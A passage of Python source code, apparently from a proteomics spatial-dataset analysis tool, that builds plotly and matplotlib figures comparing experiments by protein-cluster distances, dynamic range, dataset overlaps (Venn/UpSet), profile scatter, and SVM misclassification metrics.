df_distance_selectedExp_global.set_index(["Gene names", level_of_interest, "Cluster"], inplace=True)
df_cluster_xmaps_distance_global = pd.DataFrame()
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_distance_selectedExp_global" and appended to the new dataframe df_cluster_xmaps_distance_global
for map_or_exp in map_or_exp_names:
plot_try = df_distance_selectedExp_global.xs((cluster_of_interest_comparison, map_or_exp), level=["Cluster",
level_of_interest], drop_level=False)
df_cluster_xmaps_distance_global = df_cluster_xmaps_distance_global.append(plot_try)
df_cluster_xmaps_distance_global.sort_values("Experiment_lexicographic_sort", inplace=True)
df_cluster_xmaps_distance_global.reset_index(inplace=True)
distance_boxplot_figure = px.box(df_cluster_xmaps_distance_global,
x=level_of_interest,
y="distance",
points="all",
hover_name="Gene names",
color=boxplot_color,
template="simple_white",
title="Global Manhattan distance distribution for the protein cluster: {}".format(cluster_of_interest_comparison)
)
distance_boxplot_figure.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="distance",
mirror=True),
template="simple_white"
)
return distance_boxplot_figure
def plot_biological_precision(self, multi_choice=None, clusters_for_ranking=None, min_members=5, reference=""):
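"""
Generates the biological precision summary plots based on self.df_distance_comp.
Args:
multi_choice: list of experiment names (default: all experiments)
clusters_for_ranking: list of cluster names (default: all marker clusters)
min_members: int, minimal number of quantified members per cluster, experiment and map
reference: str, experiment used for normalization in the third plot
Returns:
bp_stacked_bar: stacked bar plot of median cluster distances per experiment and map
bp_box_minus_min: box plot of median distances per map, offset by the cluster minimum
bp_box_minus_ref: box plot of median cluster distances relative to the reference experiment
"""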
if multi_choice is None:
multi_choice = self.exp_names
if clusters_for_ranking is None:
clusters_for_ranking = self.clusters_for_ranking
if len(multi_choice) == 0 or len(clusters_for_ranking) == 0:
return("Please provide at least one experiment and one cluster for ranking")
df = self.df_distance_comp.copy()
df = df[df["Experiment"].isin(multi_choice)]
df = df[df["Cluster"].isin(clusters_for_ranking)]
df_m = df.groupby(["Cluster", "Experiment", "Map"]).filter(lambda x: len(x)>=min_members)
df_c = df_m.groupby(["Cluster", "Experiment"]).median().reset_index()
df_m = df_m.groupby(["Cluster", "Experiment", "Map"]).median().reset_index()
df_m = df_m.assign(Experiment_lexicographic_sort = pd.Categorical(df_m["Experiment"], categories=multi_choice, ordered=True))
df_m = df_m.sort_values("Experiment_lexicographic_sort").drop("Experiment_lexicographic_sort", axis=1)\
.groupby("Experiment", as_index=False, group_keys=False, sort=False).apply(lambda x: x.sort_values("distance", ascending=False))
df_c = df_c.assign(Experiment_lexicographic_sort = pd.Categorical(df_c["Experiment"], categories=multi_choice, ordered=True))
df_c = df_c.sort_values("Experiment_lexicographic_sort").drop("Experiment_lexicographic_sort", axis=1)\
.groupby("Experiment", as_index=False, group_keys=False, sort=False).apply(lambda x: x.sort_values("distance", ascending=False))
bp_stacked_bar = px.bar(df_m, x="Experiment", y="distance", color="Cluster", hover_data=["Map"],
width=400+80*len(multi_choice), template="simple_white", height=100+30*len(clusters_for_ranking)).update_layout(legend_traceorder="reversed")
bp_box_minus_min = px.box(df_m.set_index(["Experiment", "Cluster", "Map"]).unstack(["Experiment", "Map"])\
.apply(lambda x: x-x.min(), axis=1).stack(["Experiment", "Map"]).reset_index()\
.sort_values(["Experiment"], key=lambda x: [multi_choice.index(el) for el in x]),
x="Experiment", y="distance", color="Experiment", hover_data=["Cluster", "Map"],
width=200+100*len(multi_choice), template="simple_white", height=400, points="all")\
.update_yaxes(title="distance - cluster offset (minimum)")
bp_box_minus_ref = px.box(df_c.set_index(["Experiment", "Cluster"]).unstack(["Experiment"])\
.apply(lambda x: x/x[("distance", reference)], axis=1).stack(["Experiment"]).reset_index()\
.sort_values(["Experiment"], key=lambda x: [multi_choice.index(el) for el in x])\
.loc[lambda x: x.Experiment != reference],
x="Experiment", y="distance", color="Experiment", hover_data=["Cluster"],
color_discrete_sequence=[px.colors.qualitative.D3[multi_choice.index(el)]
for el in multi_choice if el != reference],
width=200+100*len(multi_choice), template="simple_white", height=400, points="all")\
.update_yaxes(title="distance relative to {}".format(reference))
return bp_stacked_bar, bp_box_minus_min, bp_box_minus_ref
def distance_ranking_barplot_comparison(self, collapse_cluster=False, multi_choice=["Exp1", "Exp2"], clusters_for_ranking=None, ranking_boxPlot="Box plot"):#, toggle_sumORmedian=False):
#ref_exp="Exp1",
if clusters_for_ranking is None:
clusters_for_ranking = self.clusters_for_ranking
#an error message is already displayed if no experiments are selected, that is why: return ""
if len(multi_choice) < 1:
return ""
#dict_cluster_normalizedMedian = {}
#multi_choice = i_multi_choice.value
#clusters_for_ranking = i_clusters_for_ranking.value
df_distance_comp = self.df_distance_comp.copy()
df_distance_comp = df_distance_comp[df_distance_comp["Experiment"].isin(multi_choice)]
df_distance_comp = df_distance_comp[df_distance_comp["Cluster"].isin(clusters_for_ranking)]
df_quantified_cluster = df_distance_comp.reset_index()
df_quantified_cluster = df_distance_comp.drop_duplicates(subset=["Cluster", "Experiment"]).set_index(["Cluster",
"Experiment"])["distance"].unstack("Cluster")
self.df_quantified_cluster = df_quantified_cluster.notnull().replace({True: "x", False: "-"})
dict_quantified_cluster = {}
dict_cluster_normalizedMedian_ref = {}
dict_median_distance_ranking = {}
for cluster in clusters_for_ranking:
try:
df_cluster = df_distance_comp[df_distance_comp["Cluster"]==cluster]
cluster_quantity = df_cluster["Gene names"].unique().size
if cluster_quantity >= 5:
dict_quantified_cluster[cluster] = cluster_quantity
all_median_one_cluster_several_exp = {}
#ref = df_cluster["distance"].median()
for exp in multi_choice:
median = df_cluster[df_cluster["Experiment"]==exp]["distance"].median()
all_median_one_cluster_several_exp[exp] = float(median)
#new
#if exp == ref_exp:
# ref = median
ref = np.median(list(all_median_one_cluster_several_exp.values()))
dict_median_distance_ranking[cluster] = all_median_one_cluster_several_exp
median_ranking_ref = {exp: median/ref for exp, median in all_median_one_cluster_several_exp.items()}
dict_cluster_normalizedMedian_ref[cluster] = median_ranking_ref
else:
continue
except:
continue
self.cluster_above_treshold = dict_quantified_cluster.keys()
self.df_quantified_cluster2 = pd.DataFrame.from_dict({"Number of PG per Cluster":dict_quantified_cluster}).T
df_cluster_normalizedMedian_ref = pd.DataFrame(dict_cluster_normalizedMedian_ref)
df_cluster_normalizedMedian_ref.index.name="Experiment"
df_cluster_normalizedMedian_ref.rename_axis("Cluster", axis=1, inplace=True)
#median makes a huge difference, improves result of DIA, MQ, library
df_RelDistanceRanking = pd.concat([df_cluster_normalizedMedian_ref.median(axis=1), df_cluster_normalizedMedian_ref.sem(axis=1)], axis=1,
keys=["Distance Ranking (rel, median)", "SEM"]).reset_index().sort_values("Distance Ranking (rel, median)")
ranking_sum = df_cluster_normalizedMedian_ref.sum(axis=1).round(2)
ranking_sum.name = "Normalized Median - Sum"
df_ranking_sum = ranking_sum.reset_index()
#ranking_product = df_cluster_normalizedMedian.product(axis=1).round(2)
#ranking_product.name = "Normalized Median - Product"
#df_globalRanking = pd.concat([pd.DataFrame(ranking_sum), pd.DataFrame(ranking_product)], axis=1).reset_index()
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.stack("Cluster")
df_cluster_normalizedMedian_ref.name="Normalized Median"
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.reset_index()
self.df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.assign(Experiment_lexicographic_sort = pd.Categorical(df_cluster_normalizedMedian_ref["Experiment"], categories=multi_choice, ordered=True))
df_cluster_normalizedMedian_ref.sort_values("Experiment_lexicographic_sort", inplace=True)
if collapse_cluster == False:
fig_ranking = px.bar(df_cluster_normalizedMedian_ref,
x="Cluster",
y="Normalized Median",
color="Experiment",
barmode="group",
title="Ranking - normalization to reference experiments the median across all experiments for each cluster",
template="simple_white"
)
fig_ranking.update_xaxes(categoryorder="total ascending")
fig_ranking.update_layout(autosize=False,
width=1200 if len(multi_choice)<=3 else 300*len(multi_choice),
height=500,
template="simple_white"
)
return fig_ranking
else:
if ranking_boxPlot == "Bar plot - median":
fig_globalRanking = px.bar(df_RelDistanceRanking.sort_values("Distance Ranking (rel, median)"),
x="Experiment",
y="Distance Ranking (rel, median)",
title="Median manhattan distance distribution for <br>all protein clusters (n>=5 per cluster)",# - median of all individual normalized medians - reference experiment is the median across all experiments for each cluster",
error_x="SEM", error_y="SEM",
color="Experiment",
template="simple_white")
if ranking_boxPlot == "Box plot":
fig_globalRanking = px.box(df_cluster_normalizedMedian_ref,
x="Experiment",
y="Normalized Median",
title="Median manhattan distance distribution for <br>all protein clusters (n>=5 per cluster)",# "Ranking - median of all individual normalized medians - reference is the median across all experiments for each cluster",
color="Experiment",
points="all",
template="simple_white",
hover_name="Cluster")
#return pn.Column(pn.Row(fig_globalRanking), pn.Row(fig_globalRanking2))
else:
fig_globalRanking = px.bar(df_ranking_sum.sort_values("Normalized Median - Sum"),
x="Experiment",
template="simple_white",
y="Normalized Median - Sum",
title="Ranking - median of all individual normalized medians - reference is the median across all experiments for each cluster",
color="Experiment")
fig_globalRanking.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
template="simple_white"
)
return fig_globalRanking
def quantity_pr_pg_barplot_comparison(self, multi_choice=["Exp1", "Exp2"]):
"""
Barplot, showing number of protein groups/profiles.
Args:
self:
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
multi_choice: list of experiment names
Returns:
fig_quantity_pr_pg: barplot, number of protein groups/profiles before/after filtering of the intersection/total quantity
"""
df_quantity_pr_pg_combined = self.df_quantity_pr_pg_combined.copy()
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined[df_quantity_pr_pg_combined["Experiment"].isin(multi_choice)]
df_quantity_pr_pg_combined.insert(0,"Expxfiltering",[" ".join([e,f]) for e,f in zip(
df_quantity_pr_pg_combined.Experiment, df_quantity_pr_pg_combined.filtering)])
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined.assign(
Experiment_lexicographic_sort = pd.Categorical(df_quantity_pr_pg_combined["Experiment"], categories=multi_choice, ordered=True))
df_quantity_pr_pg_combined.sort_values(["Experiment_lexicographic_sort", "type"], ascending=[True, False], inplace=True)
layout = go.Layout(barmode="overlay",
#xaxis_tickangle=90,
autosize=False,
width=100*len(multi_choice)+150,
height=400,
template="simple_white")
filtered = list(np.tile(["id","profile"],len(multi_choice)))
fig_quantity_pg = px.bar(df_quantity_pr_pg_combined, x="Expxfiltering", y="number of protein groups",
color="Experiment", barmode="overlay", hover_data=["type"],
opacity=0.8, color_discrete_sequence=px.colors.qualitative.D3)
fig_quantity_pg.update_layout(layout, title="Number of Protein Groups",
xaxis={"tickmode":"array", "tickvals":[el for el in range(len(multi_choice)*2)],
"ticktext":filtered, "title": {"text": None}})
fig_quantity_pr = px.bar(df_quantity_pr_pg_combined, x="filtering", y="number of profiles",
color="type", barmode="overlay", labels={"Experiment":"", "filtering":""},
facet_col="Experiment",template="simple_white", opacity=1)\
.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
fig_quantity_pr.update_layout(layout, title="Number of Profiles" )
return fig_quantity_pg, fig_quantity_pr
def coverage_comparison(self, multi_choice=["Exp1", "Exp2"]):
"""
Barplot, showing data completeness of profiles.
Args:
self:
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
multi_choice: list of experiment names
Returns:
fig_pr_dc: barplot, data completeness of profiles before/after filtering of the intersection/total quantity
"""
df_quantity_pr_pg_combined = self.df_quantity_pr_pg_combined.copy()
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined[df_quantity_pr_pg_combined["Experiment"].isin(multi_choice)].sort_values("filtering")
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined.assign(
Experiment_lexicographic_sort = pd.Categorical(df_quantity_pr_pg_combined["Experiment"],
categories=multi_choice, ordered=True))
#df_quantity_pr_pg_combined.sort_values("Experiment_lexicographic_sort", inplace=True)
df_quantity_pr_pg_combined.sort_values(["Experiment_lexicographic_sort", "filtering"], inplace=True)
fig_pr_dc = px.bar(df_quantity_pr_pg_combined.loc[df_quantity_pr_pg_combined.type=="total"], x="Experiment", y="data completeness of profiles",
color="Experiment", barmode="overlay", hover_data=["filtering"],
template="simple_white", opacity=0.8)
fig_pr_dc.update_layout(#barmode="overlay",
#xaxis_tickangle=90,
title="Profile completeness of all<br>identified protein groups",
autosize=False,
width=100*len(multi_choice)+150,
height=400,
template="simple_white")
return fig_pr_dc
def venn_sections(self, multi_choice_venn=["Exp1"]):
"""
UpsetPlot is created based on a list of experiments. If 2/3 experiments are given, the UpsetPlot displays all possible
mutually exclusive overlapping combinations of these experiments. Additionally a Venn diagram is created using matplotlib.
Latter figure has to be transformed from matplotlib object to jpg, to make it available for the webinterface via panel/holoviz.
If more than 3 experiments are given, the UpsetPlot will be calculated only for those combinations of these experiments with at least 300 entries.
Another way to think of this is the mutually exclusive sections of a venn diagram of the sets. If the original list has N sets,
the returned list will have (2**N)-1 sets.
Args:
multi_choice_venn: list of experiment names
self:
unique_proteins_total: dict, key: Experiment name, value: unique protein (groups)
Returns:
im: Venn diagram, made available for plotly/webinterface
figure_UpSetPlot: Upsetplot figure
combinations : list of tuple
tag : str
Binary string representing which sets are included / excluded in
the combination.
set : set
The set formed by the overlapping input sets.
"""
def create_upsetplot(sets, multi_choice):
num_combinations = 2 ** len(sets)
bit_flags = [2 ** n for n in range(len(sets))]
flags_zip_sets = [z for z in zip(bit_flags, sets)]
combo_sets = []
overlapping_ids = []
experiments = []
#dictio = {}
for bits in range(num_combinations - 1, 0, -1):
include_sets = [s for flag, s in flags_zip_sets if bits & flag]
exclude_sets = [s for flag, s in flags_zip_sets if not bits & flag]
combo = set.intersection(*include_sets)
combo = set.difference(combo, *exclude_sets)
tag = "".join([str(int((bits & flag) > 0)) for flag in bit_flags])
experiment_decoded = []
for digit, exp in zip(list(tag), multi_choice):
if digit=="0":
continue
else:
experiment_decoded.append(exp)
#dictio[len(combo)] = experiment_decoded
if len(multi_choice)>3:
if len(combo)>300:
overlapping_ids.append(len(combo))
experiments.append(experiment_decoded)
else:
if len(combo)>0:
overlapping_ids.append(len(combo))
experiments.append(experiment_decoded)
#combo_sets.append((tag, len(combo)))
fig_UpSetPlot = plt.Figure()
series_UpSetPlot = from_memberships(experiments, data=overlapping_ids)
upplot(series_UpSetPlot, fig=fig_UpSetPlot, show_counts="%d")
return fig_UpSetPlot
if "Sequence" not in self.df_01_filtered_combined.index.names:
sets_proteins_total = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").index.get_level_values("Protein IDs"))
for i in multi_choice_venn]
sets_proteins_intersection = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").unstack(["Map", "Exp_Map"]).dropna()\
.index.get_level_values("Protein IDs")) for i in multi_choice_venn]
else:
sets_proteins_total = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").index.get_level_values("Sequence"))
for i in multi_choice_venn]
sets_proteins_intersection = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").unstack(["Map", "Exp_Map"]).dropna()\
.index.get_level_values("Sequence")) for i in multi_choice_venn]
figure_UpSetPlot_total = create_upsetplot(sets_proteins_total, multi_choice_venn)
figure_UpSetPlot_int = create_upsetplot(sets_proteins_intersection, multi_choice_venn)
#make matplot figure available for plotly
def convert_venn_jpg(vd):
vd = vd.figure
out_img = BytesIO()
plt.savefig(out_img, bbox_inches="tight",format="jpg", dpi=72)
out_img.seek(0) # rewind file
im = Image.open(out_img)
plt.clf()
return im
if len(multi_choice_venn) == 2:
vd_t = venn2(sets_proteins_total, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:2], alpha=0.8)
vd_t = plt.title("in at least one map")
im_t = convert_venn_jpg(vd_t)
vd_i = venn2(sets_proteins_intersection, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:2], alpha=0.8)
vd_i = plt.title("in all maps")
im_i = convert_venn_jpg(vd_i)
elif len(multi_choice_venn) == 3:
vd_t = venn3(sets_proteins_total, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:3], alpha=0.8)
vd_t = plt.title("in at least one map")
im_t = convert_venn_jpg(vd_t)
vd_i = venn3(sets_proteins_intersection, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:3], alpha=0.8)
vd_i = plt.title("in all maps")
im_i = convert_venn_jpg(vd_i)
else:
im = "Venn diagram can be displayed for 3 Experiments or less"
return im,im, figure_UpSetPlot_total, figure_UpSetPlot_int
return im_t, im_i, figure_UpSetPlot_total, figure_UpSetPlot_int
def dynamic_range_comparison(self, collapse_cluster=False, multi_choice=["Exp1", "Exp2"], ref_exp="Exp1"):
"""
A box plot for desired experiments (multi_choice) and all protein clusters is generated displaying the dynamic range
Args:
self:
multi_choice: list of experiment names
df_dynamicRange_combined: df, no index, column names: "Max", "Min", "Dynamic Range", "Cluster", "Experiment"
Returns:
fig_dynamic_range: bar plot, dynamic range of each protein cluster for desired experiments is displayed.
"""
df_dynamicRange_combined = self.df_dynamicRange_combined.copy()
df_dynamicRange_combined = df_dynamicRange_combined[df_dynamicRange_combined["Experiment"].isin(multi_choice)]
df_dynamicRange_combined = df_dynamicRange_combined.assign(Experiment_lexicographic_sort = pd.Categorical(df_dynamicRange_combined["Experiment"],
categories=multi_choice, ordered=True))
df_dynamicRange_combined.sort_values(["Experiment_lexicographic_sort", "Dynamic Range"], inplace=True)
fig_dynamic_range = px.bar(df_dynamicRange_combined,
x="Cluster",
y="Dynamic Range",
base="Min",
facet_row="Experiment",
template="simple_white",
height=400*len(multi_choice),
width=1200)
        df_dynamicRange_combined_ref = df_dynamicRange_combined.drop(["Experiment_lexicographic_sort"], axis=1)
        df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.set_index(["Cluster", "Experiment"], drop=False).unstack("Cluster")["Dynamic Range"]
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.div(df_dynamicRange_combined_ref.xs(ref_exp))
df_RelDynamicRange = pd.concat([df_dynamicRange_combined_ref.median(axis=1), df_dynamicRange_combined_ref.sem(axis=1)], axis=1,
keys=["Dynamic Range (rel, median)", "SEM"]).reset_index()
if collapse_cluster == False:
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.stack("Cluster")
df_dynamicRange_combined_ref.name="Normalized Dynamic Range"
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.reset_index()
fig_RelDynamicRange = px.bar(df_dynamicRange_combined_ref,
x="Cluster",
y="Normalized Dynamic Range",
title="Dynamic Range - normalization to reference experiment: {}".format(ref_exp),
barmode="group",
template="simple_white",
color="Experiment")
fig_RelDynamicRange.update_xaxes(categoryorder="total ascending")
fig_RelDynamicRange.update_layout(autosize=False,
width=1200 if len(multi_choice)<=3 else 300*len(multi_choice),
height=500,
template="simple_white"
)
else:
fig_RelDynamicRange = px.bar(df_RelDynamicRange.sort_values("Dynamic Range (rel, median)"),
x="Experiment",
y="Dynamic Range (rel, median)",
error_x="SEM", error_y="SEM",
template="simple_white",
title="Dynamic Range - median of all individual normalized medians - reference experiment: {}".format(ref_exp),
color="Experiment")
fig_RelDynamicRange.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
template="simple_white"
)
return pn.Column(pn.Row(fig_dynamic_range), pn.Row(fig_RelDynamicRange))
def calculate_global_scatter(self, multi_choice, metric, consolidation):
"""
A distribution plot of the profile scatter in each experiment is generated, with variable distance metric and consolidation of replicates.
Args:
self:
df_01_filtered_combined: df, indexed
multi_choice: list of experiment names
metric: distance metric, one of 'euclidean distance', 'manhattan distance', '1 - cosine correlation', '1 - pearson correlation'
consolidation: method to consolidate replicate distances, one of 'median', 'average', 'sum'
Returns:
            plot: plotly.figure_factory.create_distplot figure, shows kernel density estimation in the main pane and a rug plot underneath. Traces are sorted by ascending median of the distribution.
"""
# Option dictionaries
cons_functions = {
"median": np.median,
"average": np.mean,
"sum": np.sum
}
metrics = {
"euclidean distance": "euclidean",
"manhattan distance": "manhattan",
"1 - cosine correlation": "cosine",
"1 - pearson correlation": lambda x,y: 1-np.corrcoef(x,y)[0][1],
"manhattan distance to average profile": [np.mean, pw.paired_manhattan_distances],
"manhattan distance to median profile": [np.median, pw.paired_manhattan_distances]
}
# Option assertion
assert consolidation in cons_functions.keys()
assert metric in metrics.keys()
# Filter experiments and intersection of proteins
df = self.df_01_filtered_combined.loc[
self.df_01_filtered_combined.index.get_level_values("Experiment").isin(multi_choice)].copy()
df.index = df.index.droplevel(["Exp_Map", "Gene names", "Compartment"])
if "Sequence" in df.index.names:
df.index = df.index.droplevel(["Protein IDs"])
df_across = df.unstack(["Experiment", "Map"]).dropna().stack(["Experiment", "Map"])
nPG = df_across.unstack(["Experiment", "Map"]).shape[0]
# Calculate and consolidate distances
distances = pd.DataFrame()
for exp in multi_choice:
df_m = df_across.xs(exp, level="Experiment", axis=0)
maps = list(set(df_m.index.get_level_values("Map")))
# this if clause switches between pairwise comparisons of profiles (else) and comparisons to an average/median profile
if " to " in metric:
df_m = df_m.unstack("Map")
# calculate reference profiles
df_profiles = df_m.stack("Fraction").apply(metrics[metric][0], axis=1).unstack("Fraction")
# calculate the distance for every map
distances_m = pd.DataFrame()
for m in maps:
dist_m = pd.DataFrame(metrics[metric][1](df_m.xs(m, level="Map", axis=1), df_profiles), columns = [m])
distances_m = pd.concat([distances_m, dist_m], axis=1)
distances_m.index = df_m.index
else:
distances_m = pd.DataFrame()
# loop over pairs of maps
for i,mapi in enumerate(maps):
for j,mapj in enumerate(maps):
# only look at each comparison once
if j <= i:
continue
dist = pw.paired_distances(df_m.xs(mapi, level="Map", axis=0).values,
df_m.xs(mapj, level="Map", axis=0).values,
metric = metrics[metric])
dist = pd.Series(dist, name="_".join([mapi,mapj]))
distances_m = pd.concat([distances_m, dist], axis=1)
distances_m.index = df_m.xs(maps[0], level="Map", axis=0).index
distances = pd.concat([distances, pd.Series(distances_m.apply(cons_functions[consolidation], axis=1), name=exp)], axis=1)
distances.index = distances_m.index
self.distances = distances
# Create and return plot
plot = ff.create_distplot(distances.T.values, distances.columns, show_hist=False)
plot.update_layout(title="Distribution of {} {}s, n = {}".format(metric, consolidation, nPG),
width=1500, height=600, template="simple_white", xaxis={"rangemode": "nonnegative"})
return plot
def svm_processing(self):
"""
The misclassification matrix, generated by Perseus, will be used for Recall/Precision calculation of each individual cluster and on a global level.
Data will be stored in a local dictionary that will be assigned to the global dictionary.
Args:
self.df_SVM: dataframe, provided by Perseus, no index;
Column names: e.g. "Predicted: ER", "Predicted: NPC"
Rows: e.g. "True: ER", "True: NPC"
Returns:
self.analysed_datasets_dict:
local dictionary (SVM_dict) will be assigned to the global dictionary self.analysed_datasets_dict, that is available for downloading
{"Experiment name" : {see def read_jsonFile(self) [below]}
{"Misclassification Analysis":
{
"True: ER" : {
"Recall": int,
"FDR": int,
"Precision": int,
"F1": int
}
"True: NPC" : {...}
...
"Summary": {...}
}
}
}
"""
global_SVM_dict_total = {}
global_SVM_dict = {}
for exp in self.json_dict.keys():
try:
df_SVM = pd.read_json(self.json_dict[exp]["Misclassification Matrix"])
df_SVM["T: True group"] = df_SVM["T: True group"].str.replace(r'True: ', '')
except KeyError:
continue
SVM_dict = {}
all_correct = np.diag(df_SVM)
members = df_SVM.sum(axis=1)
total_members = 0
            membrane_members = 0
membrane_correct = 0
all_organelle_recall = []
all_organelle_precision = []
all_organelle_f1 = []
F1_all_cluster = []
no_of_membrane_clusters = 0
total_correct = sum(all_correct)
predicted_one_organelle = df_SVM.sum(axis=0)
for i in range(len(df_SVM)):
total_members = total_members + members[i]
recall = all_correct[i]/members[i]
fdr = (predicted_one_organelle[i]-all_correct[i])/predicted_one_organelle[i]
precision = 1-fdr
F1 = statistics.harmonic_mean([recall, precision])
F1_all_cluster.append(F1)
SVM_dict[df_SVM["T: True group"][i]] = {"Recall": recall, "FDR": fdr, "Precision": precision, "F1": F1}
if df_SVM["T: True group"][i]!="Nuclear pore complex" and df_SVM["T: True group"][i]!="Large Protein Complex" and df_SVM["T: True group"][i]!="Actin binding proteins" :
no_of_membrane_clusters = no_of_membrane_clusters+1
                    membrane_members = membrane_members + members[i]
membrane_correct = membrane_correct + all_correct[i]
all_organelle_f1.append(F1)
all_organelle_recall.append(recall)
all_organelle_precision.append(precision)
total_recall = total_correct/total_members
            membrane_recall = membrane_correct/membrane_members
av_per_organelle_recall = statistics.mean(all_organelle_recall)
median_per_organelle_recall = statistics.median(all_organelle_recall)
av_per_organelle_precision = statistics.mean(all_organelle_precision)
avg_organelle_f1 = statistics.mean(all_organelle_f1)
avg_F1_all_cluster = statistics.mean(F1_all_cluster)
SVM_dict_total = {}
SVM_dict_total["Avg. all clusters"] = {"Recall": total_recall, "F1": avg_F1_all_cluster} #total recall = marker prediction accuracy
SVM_dict_total["Avg. all organelles"] = {"Recall": av_per_organelle_recall, "F1": avg_organelle_f1, "Precision": av_per_organelle_precision}
SVM_dict_total["Membrane"] = {"Recall": membrane_recall}
SVM_dict_total["Median. per organelle"] = {"Recall": median_per_organelle_recall}
global_SVM_dict[exp] = SVM_dict
global_SVM_dict_total[exp] = SVM_dict_total
self.global_SVM_dict = global_SVM_dict
self.global_SVM_dict_total = global_SVM_dict_total
if global_SVM_dict=={}:
self.cache_stored_SVM = False
return
else:
df_clusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict[i][j]
for i in global_SVM_dict.keys()
for j in global_SVM_dict[i].keys()},
orient='index')
df_clusterPerformance_global.index.names = ["Experiment", "Type"]
self.df_clusterPerformance_global = df_clusterPerformance_global.T
df_AvgClusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict_total[i][j]
for i in global_SVM_dict_total.keys()
for j in global_SVM_dict_total[i].keys()},
orient='index')
df_AvgClusterPerformance_global.index.names = ["Experiment", "Type"]
self.df_AvgClusterPerformance_global = df_AvgClusterPerformance_global.T
self.cache_stored_SVM = True
return
def svm_plotting(self, multi_choice):
"""
        The marker performance (line/scatter plot) as well as the marker prediction accuracy (bar plot) is visualized.
Args:
self: df_AvgClusterPerformance_global
df_clusterPerformance_global
multi_choice: list of experiment names
"""
df_clusterPerformance_global = self.df_clusterPerformance_global
df_AvgClusterPerformance_global = self.df_AvgClusterPerformance_global
df_AvgAllCluster = df_AvgClusterPerformance_global.xs("Avg. all clusters", level='Type', axis=1)
fig_markerPredictionAccuracy = go.Figure()#data=[go.Bar(x=df_test.columns, y=df_test.loc["Recall"])])
for exp in multi_choice:
fig_markerPredictionAccuracy.add_trace(go.Bar(x=[exp], y=[df_AvgAllCluster[exp].loc["Recall"]], name=exp))
fig_markerPredictionAccuracy.update_layout(template="simple_white", #showlegend=False,
title="Marker prediction accuracy - Overall recall",
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="Marker prediction accuracy [%]",
mirror=True),
)
fig_clusterPerformance = go.Figure()
list_data_type = ["Avg. all clusters", "Avg. all organelles"]
for i,exp in enumerate(multi_choice):
df_clusterPerformance = df_clusterPerformance_global.xs(exp, level='Experiment', axis=1)
df_AvgClusterPerformance = df_AvgClusterPerformance_global.xs(exp, level='Experiment', axis=1)
fig_clusterPerformance.add_trace(go.Scatter(x=df_clusterPerformance.columns, y=df_clusterPerformance.loc["F1"],
marker=dict(color=pio.templates["simple_white"].layout["colorway"][i]), name=exp))
for data_type in list_data_type:
fig_clusterPerformance.add_trace(go.Scatter(x=[data_type], y=[df_AvgClusterPerformance[data_type].loc["F1"]],
mode="markers",
showlegend=False,
marker=dict(color=pio.templates["simple_white"].layout["colorway"][i])
))
fig_clusterPerformance.update_layout(template="simple_white", #showlegend=False,
title="Cluster wise SVM analysis",
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="F1 score", #- harmonic mean of recall and precision
mirror=True),
)
return fig_markerPredictionAccuracy, fig_clusterPerformance
def __repr__(self):
return str(self.__dict__)
#return "This is a spatial dataset with {} lines.".format(len(self.df_original))
def svm_heatmap(df_SVM):
"""
The misclassification matrix, generated by Perseus, will be displayed as a heatmap.
Args:
self.df_SVM: dataframe, provided by Perseus, no index;
Column names: e.g. "Predicted: ER", "Predicted: NPC"
Rows: e.g. "True: ER", "True: NPC"
Returns:
fig_SVMheatmap: heatmap of the misclassification matrix
"""
#df_SVM = self.df_SVM.copy()
#if hasattr(df_SVM, "keys") == True:
try:
df_SVM = pd.read_json(df_SVM["Misclassification Matrix"])
df_SVM = df_SVM.set_index("T: True group")[::-1]
except:
df_SVM = df_SVM.set_index("T: True group")[::-1]
y_axis_label = df_SVM.index
x_axis_label = df_SVM.columns
data_svm = df_SVM.values
fig_SVMheatmap = go.Figure()
fig_SVMheatmap.add_trace(go.Heatmap(
z=data_svm,
x = x_axis_label,
y = y_axis_label,
colorscale=[
[0.0, "green"],
[0.01, "white"],
[1.0, "red"]
],
))
return fig_SVMheatmap
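# Hypothetical usage of svm_heatmap ("Exp1" is a placeholder; the entry must carry the
# "Misclassification Matrix" key handled in the try-block above):
#   fig = svm_heatmap(json_dict["Exp1"])
#   fig.show()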
def reframe_df_01_fromJson_for_Perseus(json_dict):
"""
Make 0-1 normalized data from all experiments available for Perseus
Args:
json: dictionary, json file uploaded in manage dataset tab.
Return:
